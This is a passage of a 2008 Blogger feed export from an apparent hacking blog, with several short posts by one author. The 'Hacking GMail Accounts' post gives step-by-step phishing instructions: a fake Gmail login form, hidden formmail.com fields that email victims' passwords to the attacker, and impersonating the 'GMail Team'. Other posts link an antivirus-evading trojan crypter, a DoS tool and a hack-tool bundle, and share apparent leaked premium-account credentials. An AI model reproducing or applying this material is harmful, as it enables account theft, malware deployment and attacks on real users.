type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8915849482146711031'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8915849482146711031'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/12/firemaster-firefox-master-password.html' title='FireMaster The Firefox Master Password Recovery Too'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3454282926239946158</id><published>2008-11-29T00:41:00.000-08:00</published><updated>2008-11-29T00:52:06.510-08:00</updated><title type='text'>Hacking GMail Accounts</title><content type='html'>Hacking GMail Accounts&lt;br /&gt;Step 1 : Create your own fake gmail login form using HTML, which may look like one as shown below-&lt;br /&gt;&lt;br /&gt;http://i37.tinypic.com/2mmsbx0.gif&lt;br /&gt;&lt;br /&gt;Here's the html required:&lt;br /&gt;http://www.mediafire.com/?htynwzcwxek&lt;br /&gt;&lt;br /&gt;Step 2:&lt;br /&gt;We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.&lt;br /&gt;The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.&lt;br /&gt;This can be done in two ways-&lt;br /&gt;&lt;br /&gt;1) Using online form processors, which are freely available and ready to use.&lt;br /&gt;eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-&lt;br /&gt;&lt;br /&gt;Your form must start with the following &lt;form&gt; HTML tag:&lt;br&gt;&lt;br /&gt;&lt;form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192"&gt;&lt;br /&gt;You must also include the following hidden configuration fields &lt;br /&gt;in your form so that formmail.com knows what account and form processor &lt;br /&gt;to use on the submitted data:&lt;br /&gt;&lt;input type="hidden" name="_pid" value="94566"&gt;&lt;br /&gt;&lt;input type="hidden" name="_fid" value="36THG54Z"&gt;&lt;br /&gt;You must also inform this form processor who you wish to have your &lt;br /&gt;form results emailed to. To do so, you must include a hidden form &lt;br /&gt;field that specifies the recipient:&lt;br /&gt;&lt;input type="hidden" name="recipient" value="your email address"&gt;&lt;br /&gt;Please Note: the above field will work, but an even better solution &lt;br /&gt;is to use the ID number for that email address (thus hiding your &lt;br /&gt;address from spammers):&lt;br /&gt;&lt;input type="hidden" name="recipient" value="1"&gt;&lt;br /&gt;&lt;br /&gt;Continued..&lt;br /&gt;Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.&lt;br /&gt;Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.&lt;br /&gt;Note that, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.&lt;br /&gt;As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .&lt;br /&gt;That's It............!&lt;br /&gt;&lt;br /&gt;This is a common fake page login&lt;br /&gt;But it works!&lt;br /&gt;For newbies.&lt;br /&gt;Ignore if you already know&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3454282926239946158?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3454282926239946158/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3454282926239946158' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3454282926239946158'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3454282926239946158'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/hacking-gmail-accounts.html' title='Hacking GMail Accounts'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3912210604799131813</id><published>2008-11-28T00:33:00.001-08:00</published><updated>2008-11-28T00:34:44.517-08:00</updated><title type='text'>BLUETOOTH REMOTE CONTROL V2</title><content type='html'>&lt;span class="Apple-style-span"   style="line-height: 16px; font-family:Verdana;font-size:11px;"&gt;&lt;span class="Apple-style-span" style=""&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;Control Your Pc from your cell phone.&lt;br /&gt;Appz like media player, Ms Office and many more.&lt;br /&gt;Control your mouse pointer and see your desktop on your mobile screen.&lt;br /&gt;&lt;br /&gt;100% WORKING &lt;br /&gt;&lt;br /&gt;Very Good product,Enjoy&lt;br /&gt;http://rapidshare.com/files/146250062/Bluetooth_mahek_cw.rar&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3912210604799131813?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3912210604799131813/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3912210604799131813' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3912210604799131813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3912210604799131813'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/bluetooth-remote-control-v2.html' title='BLUETOOTH REMOTE CONTROL V2'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8488220212684954855</id><published>2008-11-28T00:32:00.001-08:00</published><updated>2008-11-28T00:35:28.239-08:00</updated><title type='text'>ALL IN ONE : ULTRA HACKER 155 IN 1</title><content type='html'>&lt;span class="Apple-style-span"   style="color: rgb(51, 51, 51);   line-height: 16px; font-family:Verdana;font-size:11px;"&gt;&lt;h3 class="post-title entry-title"   style=" font-weight: bold; color: rgb(0, 51, 102); margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; padding-top: 4px; padding-right: 0px; padding-bottom: 4px; padding-left: 8px;  text-transform: uppercase; background-color: rgb(204, 0, 0); letter-spacing: 0.5px; font-family:Arial, 'Trebuchet MS', sans-serif;font-size:105%;"&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 255, 255);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class="post-header-line-1" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;/div&gt;&lt;div class="post-body entry-content" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;a href="http://i212.photobucket.com/albums/cc94/Dl4All/album2/Ultra-Hacker-155-in-1.jpg" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(0, 51, 102); background-color: inherit; text-decoration: none; "&gt;&lt;img src="http://i212.photobucket.com/albums/cc94/Dl4All/album2/Ultra-Hacker-155-in-1.jpg" border="0" alt="" style="display: block; text-align: center; cursor: pointer; width: 320px; height: 212px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;155 Hack Tools All in One:&lt;br /&gt;Anon FTP&lt;br /&gt;BMP Ripper&lt;br /&gt;CIA 10&lt;br /&gt;FTP BR&lt;br /&gt;Hack the game&lt;br /&gt;Brutus&lt;br /&gt;Genxe&lt;br /&gt;AsPack 21&lt;br /&gt;Hack flash template&lt;br /&gt;Hydra&lt;br /&gt;Hack My space&lt;br /&gt;Blaster W32&lt;br /&gt;and more...&lt;br /&gt;&lt;br /&gt;Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.&lt;br /&gt;&lt;br /&gt;Download: 58 MB&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/157490211/superhacks2008_www.dl4all.com.rar&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8488220212684954855?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8488220212684954855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8488220212684954855' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8488220212684954855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8488220212684954855'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/all-in-one-ultra-hacker-155-in-1.html' title='ALL IN ONE : ULTRA HACKER 155 IN 1'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i212.photobucket.com/albums/cc94/Dl4All/album2/th_Ultra-Hacker-155-in-1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4445433776948005248</id><published>2008-11-28T00:29:00.000-08:00</published><updated>2008-11-28T00:35:43.375-08:00</updated><title type='text'>WITHOUT YOUR PASSWORD, NOBODY CAN COPY YOUR FILES AWAY!!(REUPLOADED)</title><content type='html'>&lt;span class="Apple-style-span"   style="color: rgb(51, 51, 51);   line-height: 16px; font-family:Verdana;font-size:11px;"&gt;&lt;h3 class="post-title entry-title"   style=" font-weight: bold; color: rgb(0, 51, 102); margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; padding-top: 4px; padding-right: 0px; padding-bottom: 4px; padding-left: 8px;  text-transform: uppercase; background-color: rgb(204, 0, 0); letter-spacing: 0.5px; font-family:Arial, 'Trebuchet MS', sans-serif;font-size:105%;"&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 255, 255);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class="post-header-line-1" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;/div&gt;&lt;div class="post-body entry-content" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;a href="http://i34.tinypic.com/30b01gg.png" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: none; color: rgb(204, 0, 1); background-color: inherit; "&gt;&lt;img src="http://i34.tinypic.com/30b01gg.png" border="0" alt="" style="display: block; text-align: center; cursor: pointer; width: 400px; height: 273px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://i35.tinypic.com/2exavj7.png" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(0, 51, 102); background-color: inherit; text-decoration: none; "&gt;&lt;img src="http://i35.tinypic.com/2exavj7.png" border="0" alt="" style="display: block; text-align: center; cursor: pointer; width: 502px; height: 393px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;AntiCopy Personal Edition is an useful software that provides complete protection against data theft from personal or laptop computers.&lt;br /&gt;&lt;br /&gt;Worried about someone stealing your personal documents, or your contact list?&lt;br /&gt;&lt;br /&gt;With Personal Edition, you are able to prevent the attachment of unauthorized portable storage devices, keep a log of all device use, and 'whitelist' your own frequently used devices.&lt;br /&gt;&lt;br /&gt;AntiCopy Personal edition provides you with the confidence that your computer is shielded from data theft no matter where you are.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.rapidspread.com/file.jsp?id=kcovqpxqyz" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; background-color: inherit; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;Download Link1&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;/span&gt;&lt;a href="http://rapidshare.com/files/163776648/AntiCopyPersonal-shakil1201108.rar" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; background-color: inherit; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;Download Link2&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.megaupload.com/?d=D6P4RH4U" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; background-color: inherit; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;Download Link3&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.filefactory.com/file/29dc75/n/AntiCopyPersonal-shakil0801108_Reuploaded_rar" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; background-color: inherit; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;Donload Link4&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4445433776948005248?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4445433776948005248/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4445433776948005248' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4445433776948005248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4445433776948005248'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/without-your-password-nobody-can-copy.html' title='WITHOUT YOUR PASSWORD, NOBODY CAN COPY YOUR FILES AWAY!!(REUPLOADED)'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i34.tinypic.com/30b01gg_th.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2616208309934982944</id><published>2008-11-28T00:28:00.000-08:00</published><updated>2008-11-28T00:36:28.837-08:00</updated><title type='text'></title><content type='html'>&lt;span class="Apple-style-span"   style="color: rgb(51, 51, 51);   line-height: 16px; font-family:Verdana;font-size:11px;"&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 0, 0);"&gt;GMAIL DRIVE:&lt;br /&gt;WITH GIVES YOU A NEW THING TO STORE YOU FILE IN GMAIL DRIVE&lt;br /&gt;THE COOL THING IN GOOGLE ONLY HERE YOU CAN NOT GET IT ANY SITE EVEN IN &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://loadonetime.googlepages.com/GMAIL.JPG" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(0, 51, 102); background-color: inherit; text-decoration: none; "&gt;&lt;img src="http://loadonetime.googlepages.com/GMAIL.JPG" border="0" alt="" style="display: block; text-align: center; cursor: pointer; width: 373px; height: 240px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=XTTX9DOA" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(0, 51, 102); background-color: inherit; text-decoration: none; "&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2616208309934982944?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2616208309934982944/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2616208309934982944' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2616208309934982944'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2616208309934982944'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/gmail-drive-with-gives-you-new-thing-to.html' title=''/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-7117626259133389557</id><published>2008-11-26T10:21:00.000-08:00</published><updated>2008-11-26T10:23:28.185-08:00</updated><title type='text'>NemeSys cripTer 100(fud)</title><content type='html'>scantime criptER make&lt;br /&gt;your server trojans udt for antivirus&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;DOWNLOAD LINK&lt;br /&gt;http://rapidshare.com/files/156532723/NemeSys_cripTer.rar.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-7117626259133389557?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/7117626259133389557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=7117626259133389557' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7117626259133389557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7117626259133389557'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/nemesys-cripter-100fud.html' title='NemeSys cripTer 100(fud)'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2483366661634867217</id><published>2008-11-26T10:19:00.000-08:00</published><updated>2008-11-26T10:24:00.171-08:00</updated><title type='text'>Simple DoS Attack Tool</title><content type='html'>Simple DoS Tool&lt;br /&gt;&lt;br /&gt;http://img145.imageshack.us/img145/333/screenshotzw4.png&lt;br /&gt;&lt;br /&gt;Well I made a simple DoS tool.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;[COLOR=Red]Download:[/COLOR]&lt;br /&gt;http://rapidshare.com/files/160094510/SimpleDosTool.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2483366661634867217?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2483366661634867217/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2483366661634867217' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2483366661634867217'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2483366661634867217'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/simple-dos-tool-submitted-by.html' title='Simple DoS Attack Tool'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8964072598977633247</id><published>2008-11-26T10:02:00.001-08:00</published><updated>2008-11-26T10:02:56.273-08:00</updated><title type='text'>FM on ur google talk</title><content type='html'>Hi Guy's 'n' Gal's this is trick presently iam using this for listening FM&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FM is on your GTalk now ( Teen Taal 110...,only hindi songs)&lt;br /&gt;&lt;br /&gt;For this u need to follow these steps...,&lt;br /&gt;&lt;br /&gt;1) add this id in ur GTalk: service@gtalk2voip.com&lt;br /&gt;2) than add: 110@radio.gtalk2voip.com&lt;br /&gt;&lt;br /&gt;After completion of these 2 steps&lt;br /&gt;Then make a cal to 110@radio.gtalk2voip.com than u wil be directly connected to teen taal FM radio station&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8964072598977633247?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8964072598977633247/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8964072598977633247' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8964072598977633247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8964072598977633247'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/fm-on-ur-google-talk.html' title='FM on ur google talk'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1401015343892276723</id><published>2008-11-26T09:57:00.000-08:00</published><updated>2008-11-26T09:58:15.772-08:00</updated><title type='text'>RAPID SHARE PREMIUM ACCOUNTS 100% WORK</title><content type='html'>Another Working Premium Account&lt;br /&gt;Login: 6337098&lt;br /&gt;Password: r2sTVBZRkZ&lt;br /&gt;Traffic left:10000 MB(+92 GB)&lt;br /&gt;Expiration date:Tue, 2. Dec 2008&lt;br /&gt;NOTE : REMOVE SPACE THEN WEB OPEN&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1401015343892276723?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1401015343892276723/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1401015343892276723' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1401015343892276723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1401015343892276723'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/rapid-share-premium-accounts-100-work.html' title='RAPID SHARE PREMIUM ACCOUNTS 100% WORK'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5400491654153085949</id><published>2008-11-14T00:34:00.001-08:00</published><updated>2008-11-14T00:34:38.224-08:00</updated><title type='text'>Trace Indian Mobile Location &amp; Operator</title><content type='html'>http://trace.bharatiyamobile.com/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5400491654153085949?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5400491654153085949/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5400491654153085949' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5400491654153085949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5400491654153085949'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/11/trace-indian-mobile-location-operator.html' title='Trace Indian Mobile Location &amp; Operator'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8795055448356204968</id><published>2008-11-09T05:16:00.000-08:00</published><updated>2008-11-09T05:17:04.619-08:00</updated><title type='text'>IP vIA YahOO cHattIng</title><content type='html'>iP vIA YahOO cHattIng..&gt;!aND LocaTioN trAciNg&lt;br /&gt;iP vIA YahOO cHattIng..&gt;!aND LocaTioN trAciNg&lt;br /&gt;wElL......I dUnnO iF eVEry1 kNows tHIs ONe oR nOt......sO m pOstINg tHIs...aLL i fOUnd Is tHe sEndIng fILe mEthhoD eVErywhErE..sO m pOstINg thIS oNe..!&lt;br /&gt;wEn cHatTin gOTo sTArt&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;.rUN&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;TYpE "cmd" wIthoUt Quotes&lt;br /&gt;tHen TYpE "netstat -b" wIthoUt qUOteS&lt;br /&gt;aNd hIt enteR....&lt;br /&gt;tHe IP aDjaCent tO 5101 in tHe LocAl aDdrEsS Is tHe Ip oF tHE PErsOn wIth 